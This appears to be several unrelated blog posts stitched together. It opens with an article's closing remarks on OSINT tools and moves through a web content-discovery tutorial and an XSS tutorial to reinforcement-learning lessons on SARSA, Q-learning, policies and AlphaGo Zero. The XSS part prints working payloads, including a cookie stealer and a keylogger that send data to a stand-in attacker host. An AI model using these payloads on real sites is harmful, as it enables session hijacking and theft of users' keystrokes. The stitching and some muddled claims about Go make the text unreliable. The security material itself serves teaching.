
In this article, we have discussed OSINT content discovery methods that can be used in investigations and business analysis. These methods include Google hacking/Dorking, Wappalyzer, Wayback Machine, GitHub, and S3 buckets. Each of these tools has its own unique benefits that can be used to locate content from publicly available sources. I hope you find these tools useful and informative.

As always, if you have any questions or comments, please feel free to reach out to us. Thank you for reading!

In many cases, content discovery is a necessary step in the overall process of web application security testing. By uncovering content that was not intended for public viewing, we can better understand how the application works and identify potential vulnerabilities. There are a variety of methods that can be used for content discovery, each with its own advantages and disadvantages.

There are three primary methods for finding content on a website: manually, automatically, and through OSINT (Open-Source Intelligence). In this post, we'll focus on Manually Determining Content.

There are several places on a website where we may look for more material to get started.

The robots.txt file specifies which pages on a website should or shouldn't be displayed in search engine results, as well as which search engines are allowed to crawl the site. It's not unusual to block certain website sections from search engine results. These pages might be areas like administration interfaces or files intended for website customers. The file therefore provides us, as penetration testers, with a list of locations that the site's owners don't want us to discover.
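As an illustration, the sketch below parses the Disallow entries out of a robots.txt body; in practice you would first fetch the file from the target (the sample content here is invented):

```python
# Minimal sketch: extract Disallow paths from a robots.txt body.
def disallowed_paths(robots_txt):
    paths = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()  # drop trailing comments
        if line.lower().startswith("disallow:"):
            path = line.split(":", 1)[1].strip()
            if path:
                paths.append(path)
    return paths

sample = """User-agent: *
Disallow: /admin/
Disallow: /private/reports/
"""
print(disallowed_paths(sample))
```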

The favicon is the little graphic that appears in the browser's tab next to the website's name. It can be a useful indicator of the technology used on a website.

When a website is developed using a framework, the installer's favicon may remain in the browser tab. If the website developer doesn't replace this with a custom one, it might indicate which framework they're using.

OWASP hosts a database of standard framework icons (the Favicon Database) that you can check the target's favicon against. Once we've identified the framework, we can use external sources to learn more about its stack.
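A common way to use such a database is to hash the favicon bytes and look the digest up. The sketch below does this with MD5; the hash-to-framework mapping shown is a placeholder (the key is just the MD5 of an empty file), not a real entry from the OWASP database:

```python
import hashlib

# Placeholder mapping: the key below is the MD5 of an empty file, NOT a real
# entry from the OWASP favicon database.
KNOWN_FAVICONS = {"d41d8cd98f00b204e9800998ecf8427e": "example-framework"}

def favicon_fingerprint(favicon_bytes):
    digest = hashlib.md5(favicon_bytes).hexdigest()
    return digest, KNOWN_FAVICONS.get(digest, "unknown")

# In practice, pass the downloaded favicon bytes instead of b"".
digest, framework = favicon_fingerprint(b"")
print(digest, framework)
```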

A sitemap is a file that lists all the pages on a website. It can be used as a content discovery tool because it provides an overview of all the content on a site. Sitemaps are especially helpful when you're trying to identify which sections of a website are being blocked by the robots.txt file. The `sitemap.xml` file may be accessed by appending `/sitemap.xml` to the website URL.
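A sitemap can be parsed with the standard library; the sketch below extracts the `<loc>` entries from a small invented sitemap document:

```python
import xml.etree.ElementTree as ET

# Extract the <loc> URLs from a sitemap.xml body.
def sitemap_urls(xml_text):
    ns = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}
    root = ET.fromstring(xml_text)
    return [loc.text for loc in root.findall(".//sm:loc", ns)]

sample = """<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>https://example.com/</loc></url>
  <url><loc>https://example.com/hidden/page</loc></url>
</urlset>"""

print(sitemap_urls(sample))
```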

HTTP response headers can be a valuable source of information for content discovery. They contain metadata about the server, such as the webserver software and possibly the programming/scripting language in use. For example, the headers might reveal that the web server is NGINX version 1.18.0 and that the site runs PHP version 7.4.3. Using this information, we may discover vulnerable versions of software in use.

We can display the HTTP headers with a curl command against the web server, using the `-v` switch to enable verbose mode, which prints the headers:

```
curl http://ip -v
```

Once we've identified the content management system (CMS) in use, we can investigate further to learn about the framework stack. The framework stack refers to the collection of software used to power a website. It usually includes a web server, a CMS, and a database. Often, the framework stack is revealed in the HTML headers of the website. We may discover even more information from there, such as the software's features and other information, which might lead us to additional material.
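To make the header data usable programmatically, a raw response (as printed by `curl -v`) can be parsed into a dictionary; the sample below mirrors the NGINX/PHP versions from the example above:

```python
# Parse a raw HTTP response header block into a dict keyed by lowercase name.
def parse_headers(raw):
    headers = {}
    for line in raw.strip().splitlines()[1:]:  # skip the status line
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return headers

sample = """HTTP/1.1 200 OK
Server: nginx/1.18.0
X-Powered-By: PHP/7.4.3"""

h = parse_headers(sample)
print(h["server"], h["x-powered-by"])
```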

In this post, we've looked at some methods for manual content discovery. We've seen how to use the robots.txt file, favicon, sitemap.xml, and HTTP headers to get started. We've also looked at how to identify the content management system (CMS) in use and investigate the framework stack. These techniques can be valuable in our efforts to gather more information about a website.

Cross-Site Scripting, known as XSS in the cybersecurity world, is a type of injection attack in which attackers inject malicious JavaScript into a website so that it is loaded and executed by other users' browsers, allowing the attackers to target those users' accounts.

If you can get JavaScript to execute on a user's computer, you may do a lot of things. This might range from monitoring the victim's cookies to seizing control of their session, running a keylogger that records every keystroke the user makes while visiting the website, or redirecting them to an entirely different website altogether.

The payload in XSS is the JavaScript code we want to execute on the target's computer. There are two components to the payload: an intention and a modification.

The intention is what you want the JavaScript to do in practice, while the modification defines the changes that must be made to the code for it to execute, as each situation is unique.

This is the most basic type of payload, where all you want to accomplish is to demonstrate that you can XSS a webpage. This is generally achieved by causing an alert box to appear on the page with some arbitrary text, such as:

```
<script>alert('Yaj, XSS the webpage!');</script>
```

Cookies on the targets' computers are commonly used to store information about a user's session, such as login tokens. The following code utilizes a JavaScript function to steal the victim's cookie, base64-encode it for transmission, and then send it to a website controlled by the hacker. The hacker may then use the cookies to take over the target's session and impersonate that person.

```
<script>fetch('https://hackerwebpage.com/steal?cookie=' + btoa(document.cookie));</script>
```

The following script is a key logger. This means anything you type on the website will be sent to a website under the hacker's control. If the site where the payload was delivered accepted user registrations or credit card information, this might be quite dangerous.

```
<script>document.onkeypress = function(e) { fetch('https://hackerwebpage.com/log?key=' + btoa(e.key) );}</script>
```

A reflected XSS vulnerability can occur when user-supplied data from an HTTP request is included in the page's response without any validation.

The attacker may post links or embed them in an iframe on a different website to potential victims, enticing them to execute code on their browser, potentially leaking session or consumer data.

Every conceivable entry point should be tested; these include:

- Parameters in the URL Query String
- URL File Path
- Sometimes HTTP Headers
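When testing query-string parameters, the payload usually needs to be URL-encoded before being placed in the URL. A minimal sketch (the target URL and parameter name are hypothetical):

```python
from urllib.parse import quote

# Hypothetical target URL and parameter; the payload is the basic alert test.
payload = "<script>alert('XSS')</script>"
test_url = "https://target.example/search?q=" + quote(payload, safe="")
print(test_url)
```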

In stored XSS, the payload is saved by the web application (in a database, for example) and then executed when other users visit the site or page.

The attacker's malicious JavaScript might redirect users to another site, capture the user's session cookie, or execute other website operations while posing as a visitor.

You'll need to test every conceivable entry point where data is believed to be stored and then presented back in areas that other users have access to.

Once you've discovered some data that's being kept in a web application, you'll need to ensure that your JavaScript payload will work; your code will probably be injected into a text area in a web page somewhere.

The Document Object Model (DOM) is a programming interface for HTML and XML documents. It functions as a proxy for the document, allowing applications to modify the document's structure, style, and content. A web page is a document, and it can be viewed in the browser window or as an HTML source file.

JavaScript is executed inside the client-side web browser within the DOM. This refers to attacks that target websites where the data isn't being transmitted or submitted to a backend server.

The malicious code may be used to capture information from the user's session and redirect them to another website or steal content from the page or their session.

DOM Based XSS is difficult to test for and needs a thorough understanding of JavaScript to comprehend the source code. You'd need to search for bits of user-supplied input in the DOM (Document Object Model) and then inject your code.

You must also study how they are handled and whether the values are ever written to the web page's DOM or passed to unsafe JavaScript functions like **eval()** or **setTimeout()**.

Blind XSS is similar to stored XSS in that your payload is saved on the site for another user to view, but you can't see the payload working or test it against yourself.

The attacker's JavaScript may call back to the attacker's website, revealing the portal URL, cookies, and even what is being viewed on the portal page. The hacker then has access to a staff member's session and their internal portal.

A callback is required when testing for Blind XSS attacks. This way, you can determine if and when your code is run.

xsshunter is a popular tool for Blind XSS attacks. Although constructing your own JavaScript program is possible, xsshunter will automatically collect cookies, URLs, page contents, and more.

In conclusion, XSS vulnerabilities are usually among the biggest risks for web applications and websites because of their potentially disastrous effects on users. The best way to protect against these attacks is to properly validate all user-supplied data and to stay alert for newly discovered exploit techniques.

TD-Learning analyzes the observed experiences and, based on that data, optimizes the action-value function \(Q(s, a)\) or the value function \(V(s)\) for use in future operations. TD-Learning is similar to **Stochastic Gradient Descent (SGD)** as used in neural networks in that it slightly shifts the parameters in each iteration to improve the neural network performance gradually.

Each TD-Learning step considers a sequence \(s_t, a_t, r_{t+1}, s_{t+1}, a_{t+1}\) from a trajectory \(\tau\) at a timestep \(t\). Further, a learning-rate hyperparameter \(\alpha \in (0, 1)\) is needed, and the discount factor for future rewards \(\gamma\) has to be taken into consideration. TD-Learning shifts the existing function toward the **TD target** given by \(r_{t+1} + \gamma V(s_{t+1})\) or \(r_{t+1} + \gamma Q(s_{t+1}, a_{t+1})\) respectively, which estimates the function from the observed trajectory:

$$ \text{new function} = (1 - \alpha) \cdot \text{current function} + \alpha \cdot \text{observed function} $$ $$ \text{new value} = (1 - \alpha) \cdot \text{old value} + \alpha \cdot \text{TD target} $$

$$ V(s_t) = (1 - \alpha) V(s_t) + \alpha (r_{t+1} + \gamma V(s_{t+1})) $$ $$ V(s_t) = V(s_t) - \alpha V(s_t) + \alpha (r_{t+1} + \gamma V(s_{t+1})) $$ $$ V(s_t) = V(s_t) + \alpha (r_{t+1} + \gamma V(s_{t+1}) - V(s_t)) $$
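To make the update concrete, here is a single numeric TD(0) step with illustrative values \(\alpha = 0.1\), \(\gamma = 0.9\), a current estimate \(V(s_0) = 0\), a successor value \(V(s_1) = 5\), and an observed reward \(r = 1\):

```python
# One concrete TD(0) value update (illustrative numbers).
alpha, gamma = 0.1, 0.9
V = {"s0": 0.0, "s1": 5.0}   # current value estimates
r = 1.0                      # reward observed when moving s0 -> s1

td_target = r + gamma * V["s1"]                     # 1 + 0.9 * 5 = 5.5
V["s0"] = V["s0"] + alpha * (td_target - V["s0"])   # 0 + 0.1 * 5.5 = 0.55
print(V["s0"])
```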

$$ Q(s_t, a_t) = (1 - \alpha) Q(s_t, a_t) + \alpha (r_{t+1} + \gamma Q(s_{t+1}, a_{t+1})) $$ $$ Q(s_t, a_t) = Q(s_t, a_t) - \alpha Q(s_t, a_t) + \alpha (r_{t+1} + \gamma Q(s_{t+1}, a_{t+1})) $$ $$ Q(s_t, a_t) = Q(s_t, a_t) + \alpha (r_{t+1} + \gamma Q(s_{t+1}, a_{t+1}) - Q(s_t, a_t)) $$

It's also worth noting that TD-Learning can learn from past experiences and even incomplete trajectories, because only a single sequence \(s_t, a_t, r_{t+1}, s_{t+1}, a_{t+1}\) needs to be analyzed per update. This is significant for RL problems that have no terminal state.

RL algorithms that learn from generated trajectories face a dilemma. Generating a trajectory \(\tau\) requires a policy \(\pi(a | s)\). On the one hand, this policy should aim to maximize the expected return, so that new trajectories refine and profit from the learned parameters. On the other hand, we need to explore unanticipated options so that we don't get trapped in a poor local optimum.

As a result, we should take a brief look at the \(\epsilon\)**-Greedy policy**. This policy uses a straightforward concept to balance exploration and exploitation while acting according to the currently learned model, utilizing a hyperparameter \(\epsilon \in (0, 1)\).

The first option with probability \(\epsilon\) is to choose a random action \(a\) from all available actions. This option contains the exploration aspect and hopefully leads to the discovery of new strategies.

The second choice, with probability \(1 - \epsilon\), is to select the action \(a\) greedily based on the current knowledge. This option contains the exploitation aspect and refines known strategies.
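The two cases can be sketched as a small helper function (the Q-values passed in are illustrative):

```python
import random
import numpy as np

def epsilon_greedy(q_values, epsilon):
    # Explore: with probability epsilon, pick a uniformly random action.
    if random.uniform(0, 1) < epsilon:
        return random.randrange(len(q_values))
    # Exploit: otherwise pick the action with the highest current Q-value.
    return int(np.argmax(q_values))
```

With `epsilon = 0` the policy is purely greedy; with `epsilon = 1` it is purely random.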

To compare the different approaches, each method is applied to OpenAI Gym's Taxi environment. A taxi picks up a passenger from four possible locations and drops him off at the target destination. To this end, the taxi can move in each of the four cardinal directions, as well as pick up and drop off the passenger. The methods' efficiency was evaluated using the variable "Timesteps" which indicates the number of actions taken by the taxi driver to reach the goal.

```
from IPython.display import clear_output
from time import sleep

def output(frames, animation=True):
    if animation:
        for i, frame in enumerate(frames):
            clear_output(wait=True)
            print(frame['frame'])
            print(f"Timestep: {i + 1}")
            print(f"State: {frame['state']}")
            print(f"Action: {frame['action']}")
            print(f"Reward: {frame['reward']}")
            sleep(.1)
    else:
        print(frames[-1]['frame'])
        print(f'Total timesteps: {len(frames)}')
        print('Training finished.\n')
```

```
import gym

env = gym.make("Taxi-v3").env
env.reset()

# initialize variables
epoch = 0
reward = 0
done = False
frames = []

while not done:
    epoch += 1
    # take a random action
    action = env.action_space.sample()
    state, reward, done, info = env.step(action)
    # put each rendered frame into a dict for animation
    frames.append({
        'frame': env.render(mode='ansi'),
        'state': state,
        'action': action,
        'reward': reward
    })

# output random action agent
output(frames, animation=False)
```

```
+---------+
|R: | : :G|
| : | : : |
| : : : : |
| | : | : |
|Y| : |B: |
+---------+
(Dropoff)
Total timesteps: 6955
Training finished.
```

**SARSA** is the most basic TD-Learning algorithm; it learns the action-value function \(Q(s, a)\). The name reflects that each learning step is based on the sequence state-action-reward-state-action \(s_t, a_t, r_{t+1}, s_{t+1}, a_{t+1}\).

- generate trajectory \(\tau\) using \(\epsilon\)-Greedy policy.
- for each sequence \(s_t, a_t, r_{t+1}, s_{t+1}, a_{t+1}\) adjust \(Q(s_t, a_t)\) according to: $$ Q(s_t, a_t) = Q(s_t, a_t) + \alpha \left ( r_{t+1} + \gamma Q(s_{t+1}, a_{t+1}) - Q(s_t, a_t) \right ) $$
- If learning is insufficient and time is left, go back to step 1. Else terminate the algorithm and output \(Q(s, a)\) and, if needed, the greedy policy.

```
import gym
import random
import numpy as np

env = gym.make('Taxi-v3').env

# hyperparameters
q_table = np.zeros([env.observation_space.n, env.action_space.n])
alpha = 0.1
gamma = 0.6
epsilon = 0.1

# start the SARSA learning over 10000 episodes
for i in range(10000):
    # initialize variables
    epoch = 0
    reward = 0
    done = False
    state = env.reset()
    # choose the first action epsilon-greedily
    if random.uniform(0, 1) < epsilon:
        action = env.action_space.sample()
    else:
        action = np.argmax(q_table[state])
    while not done:
        epoch += 1
        # get the next state
        next_state, reward, done, info = env.step(action)
        # choose the next action epsilon-greedily
        if random.uniform(0, 1) < epsilon:
            next_action = env.action_space.sample()
        else:
            next_action = np.argmax(q_table[next_state])
        old_value = q_table[state, action]
        next_value = q_table[next_state, next_action]
        # learn the Q-value
        q_table[state, action] = old_value + alpha * (reward + gamma * next_value - old_value)
        state = next_state
        action = next_action

# evaluate the performance
epoch = 0
done = False
frames = []
state = env.reset()
while not done:
    epoch += 1
    action = np.argmax(q_table[state])
    state, reward, done, info = env.step(action)
    frames.append({
        'frame': env.render(mode='ansi'),
        'state': state,
        'action': action,
        'reward': reward
    })

# output sarsa agent
output(frames, animation=False)
```

```
+---------+
|R: | : :G|
| : | : : |
| : : : : |
| | : | : |
|Y| : |B: |
+---------+
(Dropoff)
Total timesteps: 12
Training finished.
```

**Q-Learning** is very similar to SARSA except for the utilization of a different TD target. The new TD target is \(r_{t+1} + \gamma \max_{a \in \mathcal{A}} Q(s_{t+1}, a)\). In other words, we no longer use the observed return but the maximum Q-value currently achievable from state \(s_{t+1}\). Thus we no longer require \(a_{t+1}\), and the sequence only contains \(s_t, a_t, r_{t+1}, s_{t+1}\).

- generate trajectory \(\tau\) using \(\epsilon\)-Greedy policy.
- for each sequence \(s_t, a_t, r_{t+1}, s_{t+1}\) adjust \(Q(s_t, a_t)\) according to: $$ Q(s_t, a_t) = Q(s_t, a_t) + \alpha \left ( r_{t+1} + \gamma \max_{a \in \mathcal{A}} Q(s_{t+1}, a) - Q(s_t, a_t) \right ) $$
- If learning is insufficient and time is left, then go back to step 1. Else terminate the algorithm and output \(Q(s, a)\) and the greedy policy if needed.

```
import gym
import random
import numpy as np

env = gym.make("Taxi-v3").env
env.reset()

# hyperparameters
q_table = np.zeros([env.observation_space.n, env.action_space.n])
alpha = 0.1
gamma = 0.6
epsilon = 0.1

# start the Q-learning over 10000 episodes
for i in range(1, 10000):
    state = env.reset()
    epoch = 0
    reward = 0
    done = False
    while not done:
        epoch += 1
        # choose action epsilon-greedily
        if random.uniform(0, 1) < epsilon:
            action = env.action_space.sample()
        else:
            action = np.argmax(q_table[state])
        # get next state
        next_state, reward, done, info = env.step(action)
        old_value = q_table[state, action]
        next_max = np.max(q_table[next_state])
        # learn the Q-value
        new_value = (1 - alpha) * old_value + alpha * (reward + gamma * next_max)
        q_table[state, action] = new_value
        state = next_state

# evaluate the performance
epoch = 0
done = False
frames = []
state = env.reset()
while not done:
    epoch += 1
    action = np.argmax(q_table[state])
    state, reward, done, info = env.step(action)
    frames.append({
        'frame': env.render(mode='ansi'),
        'state': state,
        'action': action,
        'reward': reward
    })

# output
output(frames, animation=False)
```

```
+---------+
|R: | : :G|
| : | : : |
| : : : : |
| | : | : |
|Y| : |B: |
+---------+
(Dropoff)
Total timesteps: 11
Training finished.
```

Using either of the presented reinforcement learning algorithms, the goal was reached in far fewer timesteps than with the random control method. The two methods performed similarly throughout the test period (note that both methods were not evaluated on the same instance of the environment, so the optimal solutions might differ).

The change in the TD-target may seem small yet it is very important. SARSA estimates the Q-value assuming the \(\epsilon\)-Greedy policy used to generate the data \(s_t, a_t, r_{t+1}, s_{t+1}, a_{t+1}\) is maintained. Thus, SARSA optimizes the \(\epsilon\)-Greedy policy and not the greedy policy. We call this **on-policy** since the policy used for data generation and updates are **the same**.

In contrast, Q-Learning also generates data using the \(\epsilon\)-Greedy policy, yet Q-Learning updates are based on the greedy policy. Through this, Q-Learning always aims to improve the greedy policy. This behavior is called **off-policy** since the policy used for data generation and updates are **not** the same.

**Deterministic Policies:** In a deterministic policy, the action taken at each state is always the same. This can be implemented using a lookup table or decision tree. In this case, the policy is denoted by \( \mu \):

$$ a_t = \mu(s_t) $$

**Stochastic Policies:** A stochastic policy, on the other hand, may produce different actions from one instance to the next, sampled according to a probability distribution over actions. The stochastic policy is denoted by \( \pi \):

$$ a_t \sim \pi( \cdot | s_t) $$

Because the policy is essentially the agent's brain, it's not unusual to replace "policy" with "agent," such as when someone says, "The agent is attempting to maximize reward."

In deep RL, we deal with parameterized policies: computable functions whose outputs depend on a set of parameters (for example, the weights and biases of a neural network) that may be adjusted by some optimization algorithm to modify the behavior.

Categorical and diagonal Gaussian policies are the two most frequent types of stochastic policies in deep RL. Categorical policies apply to discrete action spaces, while diagonal Gaussian policies are appropriate for continuous action spaces.

**Categorical Policy:** A categorical policy is a stochastic policy over a discrete action space: in each state it assigns a probability to every possible action, and the action to take is sampled from that distribution.

**Diagonal Gaussian Policy:** Diagonal Gaussian policies, on the other hand, act in continuous action spaces: in each state the agent samples a real-valued action vector from a multivariate Gaussian distribution whose covariance matrix is diagonal.

The two most important computations for employing and training stochastic policies are:

- Sampling actions from the policy,
- Comparing log-likelihoods of various actions.

We'll go through how to implement these for both categorical and diagonal Gaussian policies in the following.

A categorical policy is comparable to a classifier in terms of its structure. You construct a neural network for a categorical policy in the same way as you would for a classifier: the input is the observation, followed by one or more layers (possibly convolutional or densely-connected, depending on the type of input), and then there's an output layer with one node for each possible action.

To take actions according to a categorical policy, we treat the network's output as a probability distribution over the possible actions given the observation, and sample an action from that distribution. Most deep learning frameworks provide built-in tools for sampling from a categorical distribution (for example, `torch.distributions.Categorical` in PyTorch or `tf.random.categorical` in TensorFlow).

For training, we also need to compute the log-probability of taking each action given the observation:

$$ \log \pi_\theta(a | s) = \log P_\theta(s)_a $$

where \( P_\theta(s) \) is the vector of action probabilities produced by the network's last layer. It is computed by feeding the observation into our neural network (which has one output node for each possible action) and applying a softmax activation to the output layer.

Once we have the log-probabilities of all the actions, we can use them in the policy-gradient objective, or compare them and act greedily by taking the action with the highest probability.
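A minimal NumPy sketch of both computations, sampling and log-likelihood, for a categorical policy (the logits stand in for raw network outputs):

```python
import numpy as np

def softmax(logits):
    z = logits - np.max(logits)  # subtract the max for numerical stability
    e = np.exp(z)
    return e / e.sum()

rng = np.random.default_rng(0)
logits = np.array([2.0, 0.5, -1.0])   # stand-in for the network's output layer
probs = softmax(logits)               # P_theta(s)

a = rng.choice(len(probs), p=probs)   # sample an action from the distribution
log_prob = np.log(probs[a])           # log pi_theta(a | s) = log [P_theta(s)]_a
```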

A multivariate normal distribution, often known as a multivariate Gaussian distribution, is characterized by a mean vector \( \mu \) and a covariance matrix \( \Sigma \). A diagonal Gaussian distribution is one in which the entries of \( \Sigma \) are all zero except for the diagonal, which consists of the variances of the individual variables.

The advantage of a diagonal Gaussian distribution is that it's easy to compute its mean and variance.

This makes it easy to sample from a diagonal Gaussian distribution: you just compute the mean and variance of each variable, then draw values for each variable independently from a standard normal distribution.

We can use a similar approach to sample actions according to a diagonal Gaussian policy: a neural network maps the state to a mean action vector, we obtain a standard deviation for each action dimension, and we then draw noise for each dimension independently from a standard normal distribution. There are two different ways that the covariance matrix is typically represented.

- A log standard deviation vector \( \log \sigma \) that is not a function of the state: the log standard deviations are standalone, learned parameters.
- A neural network that maps states to log standard deviations. It can be configured to share certain layers with the mean network if desired.

In both cases, we obtain log standard deviations rather than standard deviations directly. This is because log stds are free to take on any value in \( (-\infty, \infty) \), while stds must be nonnegative. Parameters are much easier to train when you don't have to enforce such constraints. The standard deviations can be obtained immediately by exponentiating the log standard deviations, so we don't lose anything by representing them this way.

Given the mean action \( \mu_\theta(s) \) and standard deviation \( \sigma_\theta(s) \), and a vector of noise \( z \sim \mathcal{N}(0,I)\), an action can be taken with the following formula:

$$ a = \mu_\theta(s) + \sigma_\theta(s) \cdot z$$

where \( \cdot \) denotes the elementwise product of two vectors.

The log-likelihood of a k-dimensional action \( a \) is given by:

$$ \log \pi_\theta(a | s) = - \frac{1}{2} \left ( \sum_{i=1}^k \left ( \frac{(a_i - \mu_i )^2}{\sigma_i^2} + 2 \log \sigma_i \right ) + k \log 2 \pi \right ) $$
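A small NumPy sketch of both computations for a diagonal Gaussian policy, using the sampling formula and the log-likelihood above (the mean and standard deviation values are illustrative):

```python
import numpy as np

def gaussian_log_likelihood(a, mu, sigma):
    # log pi_theta(a | s) for a diagonal Gaussian, per the formula above
    k = len(a)
    return -0.5 * (np.sum((a - mu) ** 2 / sigma ** 2 + 2 * np.log(sigma))
                   + k * np.log(2 * np.pi))

rng = np.random.default_rng(0)
mu = np.array([0.0, 1.0])      # mean action mu_theta(s), illustrative
sigma = np.array([0.5, 2.0])   # standard deviations sigma_theta(s), illustrative

z = rng.standard_normal(2)     # noise vector z ~ N(0, I)
a = mu + sigma * z             # sampled action
print(gaussian_log_likelihood(a, mu, sigma))
```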

The reason Reinforcement Learning works is because we can estimate values by taking expectations (i.e., weighted averages) of future rewards based on different policies. For example, if our policy gives us an 80% chance of going left and a 20% chance of going right, then that means that on average we can expect to be standing at the left side of a door 80% of the time and on the right 20%.

If you have two policies that both take you to the same doors with equal probability, but one is more likely than the other to lead to food (i.e., it has a higher expected reward), Reinforcement Learning will pick the policy with the greater expected reward.

In this post, we've looked at a few different ways of representing policies in Reinforcement Learning. We've seen how to represent deterministic and stochastic policies as well as diagonal Gaussian policies. In the next post, we'll look at how to actually implement these policies in code.

This blog post aims to provide a fundamental knowledge of the AlphaGo Zero architecture and the elegance of the interactions between its algorithms.

The game of Go is an ancient game originating in China more than 3000 years ago. Like chess, Go has very simple rules but requires dramatically different thinking to master. The objective of the game is to surround as much territory on the board as possible by placing white and black stones (one player uses black, the other white) sequentially on intersections (called "points") of a 19x19 grid. Unlike chess, however, there are no restrictions on where to place the first stone.

Additionally, points surrounded wholly by one color are called "territories" and associated with that color's player.

As you can see below only the dark areas are controlled by Black while White controls all bright areas:

Go differs from chess in that the number of moves possible is greater, but the minimum number of moves it takes to capture enemy pieces (a "group") is fewer than in chess.

The game starts with an empty board and both players alternately place stones on unoccupied intersections until they pass their turn. The game ends when both players pass without any territory being captured or one player concedes defeat.

Go is a perfect example for applying RL algorithms since there are no restrictions on where you can place your stone next. Additionally, Go has deep complexity meaning that if you want to beat the best human players you need to think even further ahead than they do! For more details on how AlphaGo Fan achieved this check out their original paper.

The main distinction between AlphaGo Zero and its predecessor AlphaGo is that it has no prior human knowledge or supervision; it essentially starts from the ground up (or, as some would say, "tabula rasa", which roughly translates to a blank or clean slate).

To better understand AlphaGo Zero's concept, let's break it down into simple steps. The appeal of AlphaGo Zero is that the fundamental concept is precisely how we would attempt to play a game without any prior knowledge by just knowing the rules.

Consider a game board in front of you. The first thing we'd do is look at potential scenarios that might affect the game's outcome. Naturally, the most important consideration is which route or state would provide us the greatest advantage and our opponent's reaction to our own actions. We obviously can't always anticipate every move our opponent will make or how the game will develop as a result of taking an action correctly, but it does give us a good sense of what may happen.

We record the results of our operations and compare them to previous actions in order to verify their efficacy. Every time we reach a new state, we want to know how important it is and whether there are any patterns in our path that might be used in later matches or even years down the road. The value of a state can vary during your journey and over time as you play and re-assess.

When we've finished analyzing and playing through all of the potential states and paths, we take an action based on our knowledge of the game, which means we'll choose the course of action that we've explored the most since this would be the route with which we have acquired the most information. Our decisions in a given state might differ and alter as a result of learning and increasing expertise.

In the final analysis, which takes place at the end of the game, we must evaluate our performance in the game by assessing our blunders and misjudgments on a state-by-state basis for the goals of those states. We should also look at where we got it right so that we may repeat this successful step again. After that, we have a greater knowledge of the game and can get ready for the next match with our new awareness.

AlphaGo Zero utilizes two main components, a **deep neural network** \(f_\theta\) with parameters \(\theta\) and a **Monte Carlo tree search algorithm (MCTS)**. The deep neural network takes the raw board representation of the current board, combined with previous board states into one state \(s\), as input to predict a probability for each move in the given board state, encoded as a vector \(p\), and to predict the chance of victory \(v\) for the current player, \((p, v) = f_\theta(s)\). The resulting combination of a move (action) \(a\) in board state \(s\) is called a state-action pair and is denoted by the tuple \((s, a)\).

When asked to choose its next move \(a\) in board state \(s\), the algorithm will conduct an MCTS using the deep neural network. The search utilizes a tree such that the nodes are defined by the board states \(s\) and the edges represent the state-action pairs \((s, a)\).

Moreover, each edge contains a counter \(N(s, a)\) that counts how frequently the edge was chosen during the search. The edge also contains a value \(P(s, a)\), calculated from the neural network probability \((P(s, \cdot), V(s)) = f_\theta(s)\). Note that the neural network also provides us with a value function \(V(s)\) for the current board state. Finally, each edge includes the action value \(Q(s, a)\), derived from the value function \(V(s')\) of the board state resulting from executing action \(a\).

To summarize, each edge \((s, a)\) currently has three values \(N(s, a), P(s, a), Q(s, a)\) and we can calculate the state-action pair's promise as \(Q(s, a) + U(s, a)\), in which \(U(s, a) \propto \frac{P(s, a)}{N(s, a) + 1}\) is the balance between exploration and exploitation.
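Edge selection can be sketched directly from these three values. The constant `c` below stands in for the proportionality factor hidden in \(U(s, a) \propto \frac{P(s, a)}{N(s, a) + 1}\), and the numbers are illustrative:

```python
import numpy as np

def select_action(Q, P, N, c=1.0):
    # U(s, a) = c * P(s, a) / (N(s, a) + 1), following the proportionality above;
    # c is the exploration constant hidden in the proportionality.
    U = c * P / (N + 1)
    return int(np.argmax(Q + U))

Q = np.array([0.2, 0.5, 0.1])   # action values (illustrative)
P = np.array([0.5, 0.2, 0.3])   # network priors (illustrative)
N = np.array([10, 30, 0])       # visit counts
# Here the high-Q edge wins despite the unvisited edge's large exploration bonus.
print(select_action(Q, P, N))
```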

Assuming that \(s_0\) is the board state when we start the MCTS, the tree search is composed of the following steps:

1. Initialize the tree with a single node for the current board state \(s_0\), whose edges are given by \((s_0, a)\).

2. Follow the most promising route, which is to say, always choose the edge with the greatest value of \(Q(s, a) + U(s, a)\), until an edge \((s, a)\) is selected that leads to a board state \(s'\) not yet recorded in the tree. (Step 1 in the idea diagram)

3. Expand the tree by creating a new node for the board state \(s'\), then increase the counter \(N(s, a)\) and update \(Q(s, a)\) for each edge leading to this new board position. (Step 2 in the idea diagram)

4. If the search budget for selecting the move has not yet been exhausted, return to step 2. Otherwise, return a stochastic policy \(\pi(a | s_0) \propto N(s_0, a)^{\frac{1}{\tau}}\) using the temperature hyperparameter \(\tau\), meaning that the resulting policy \(\pi(a | s_0)\) recommends moves by assigning probabilities to actions.

5. Derive the next move from the policy \(\pi(a | s_0)\). (Step 3 in the idea diagram)
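The conversion of the visit counts \(N(s_0, a)\) into the stochastic policy \(\pi(a | s_0) \propto N(s_0, a)^{\frac{1}{\tau}}\) can be sketched as follows (plain Python; the function name and the counts are hypothetical):

```python
def visit_policy(counts, tau=1.0):
    """Turn MCTS visit counts N(s0, a) into pi(a | s0) ∝ N^(1/tau)."""
    weights = {a: n ** (1.0 / tau) for a, n in counts.items()}
    total = sum(weights.values())
    return {a: w / total for a, w in weights.items()}

counts = {"a1": 80, "a2": 20}
pi = visit_policy(counts, tau=1.0)          # proportional to raw counts
pi_greedy = visit_policy(counts, tau=0.1)   # small tau sharpens toward argmax
```

A temperature \(\tau = 1\) keeps the policy proportional to the visit counts, while \(\tau \to 0\) pushes nearly all probability mass onto the most-visited move.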

The resulting policy \(\pi(a | s_0)\) can be viewed as a refinement of the raw network output probabilities \(p\), where \((p, v) = f_\theta(s_0)\).

This technique allows the algorithm to play against itself multiple times. After each self-play match has concluded, the match history can be used to construct multiple triples \((s, \pi(\cdot| s), z)\), where \(s\) is a board state, \(\pi(\cdot| s)\) contains the MCTS move probabilities for that board state, and \(z\) is an encoding of the ultimate winner of the match (i.e., did the player whose turn it was in board state \(s\) win?).

After several of these self-play matches have concluded, a batch of the available triples is chosen for training the deep neural network. For each triple \((s, \pi(\cdot| s), z)\) in the batch, training minimizes the error between the network output on the one hand and the MCTS policy and the eventual winner on the other, so that \(f_\theta(s) = (p, v) \sim (\pi(\cdot| s), z)\). (Step 4 in the idea diagram)
